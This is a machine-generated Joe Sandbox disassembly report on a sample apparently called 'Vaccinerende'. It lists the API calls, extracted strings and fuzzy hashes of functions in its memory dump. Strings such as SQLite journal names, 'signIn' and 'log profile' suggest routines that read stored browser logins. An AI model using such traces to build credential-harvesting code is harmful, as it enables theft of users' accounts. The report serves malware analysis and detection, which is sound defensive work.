                                            • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                            • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                            • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                            APIs
                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                            • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                            • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                            • memset.MSVCRT ref: 0041BA3D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$memset
                                            • String ID: -journal$-wal
                                            • API String ID: 438689982-2894717839
                                            • Opcode ID: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                            • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                            • Opcode Fuzzy Hash: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                            • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                            APIs
                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                            • EndDialog.USER32(?,00000002), ref: 00405C83
                                            • EndDialog.USER32(?,00000001), ref: 00405C98
                                              • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                              • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                            • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Item$Dialog$MessageSend
                                            • String ID:
                                            • API String ID: 3975816621-0
                                            • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                            • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                            • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                            • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                            APIs
                                            • _wcsicmp.MSVCRT ref: 00444D09
                                            • _wcsicmp.MSVCRT ref: 00444D1E
                                            • _wcsicmp.MSVCRT ref: 00444D33
                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _wcsicmp$wcslen$_memicmp
                                            • String ID: .save$http://$https://$log profile$signIn
                                            • API String ID: 1214746602-2708368587
                                            • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                            • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                            • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                            • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                            • memset.MSVCRT ref: 00405E33
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                            • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                            • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                            • String ID:
                                            • API String ID: 2313361498-0
                                            • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                            • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                            • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                            • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                            APIs
                                            • GetClientRect.USER32(?,?), ref: 00405F65
                                            • GetWindow.USER32(?,00000005), ref: 00405F7D
                                            • GetWindow.USER32(00000000), ref: 00405F80
                                              • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                            • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                            • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                            • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Window$ItemMessageRectSend$Client
                                            • String ID:
                                            • API String ID: 2047574939-0
                                            • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                            • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                            • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                            • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                            APIs
                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                            • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                            • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                            • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                            • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$memset
                                            • String ID: gj
                                            • API String ID: 438689982-4203073231
                                            • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                            • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                            • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                            • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                            APIs
                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                            • API String ID: 3510742995-2446657581
                                            • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                            • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                            • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                            • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                            APIs
                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                            • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                            • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                            • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                            • memset.MSVCRT ref: 00405ABB
                                            • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                            • SetFocus.USER32(?), ref: 00405B76
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: MessageSend$FocusItemmemset
                                            • String ID:
                                            • API String ID: 4281309102-0
                                            • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                            • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                            • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                            • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _snwprintfwcscat
                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                            • API String ID: 384018552-4153097237
                                            • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                            • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                            • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                            • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ItemMenu$CountInfomemsetwcschr
                                            • String ID: 0$6
                                            • API String ID: 2029023288-3849865405
                                            • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                            • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                            • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                            • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                            APIs
                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                            • memset.MSVCRT ref: 00405455
                                            • memset.MSVCRT ref: 0040546C
                                            • memset.MSVCRT ref: 00405483
                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$memcpy$ErrorLast
                                            • String ID: 6$\
                                            • API String ID: 404372293-1284684873
                                            • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                            • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                            APIs
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                            • wcscpy.MSVCRT ref: 0040A0D9
                                            • wcscat.MSVCRT ref: 0040A0E6
                                            • wcscat.MSVCRT ref: 0040A0F5
                                            • wcscpy.MSVCRT ref: 0040A107
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                            • String ID:
                                            • API String ID: 1331804452-0
                                            • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                            • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                            APIs
                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                            • String ID: advapi32.dll
                                            • API String ID: 2012295524-4050573280
                                            • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                            • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                            • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                            • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                            APIs
                                            Strings
                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                            • <%s>, xrefs: 004100A6
                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$_snwprintf
                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                            • API String ID: 3473751417-2880344631
                                            • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                            • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: wcscat$_snwprintfmemset
                                            • String ID: %2.2X
                                            • API String ID: 2521778956-791839006
                                            • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                            • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _snwprintfwcscpy
                                            • String ID: dialog_%d$general$menu_%d$strings
                                            • API String ID: 999028693-502967061
                                            • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                            • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                            APIs
                                            • strlen.MSVCRT ref: 00408DFA
                                              • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                            • memset.MSVCRT ref: 00408E46
                                            • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                            • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                            • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                            • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$memsetstrlen
                                            • String ID:
                                            • API String ID: 2350177629-0
                                            • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                            • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                            • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                            • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset
                                            • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                            • API String ID: 2221118986-1606337402
                                            • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                            • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                            • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
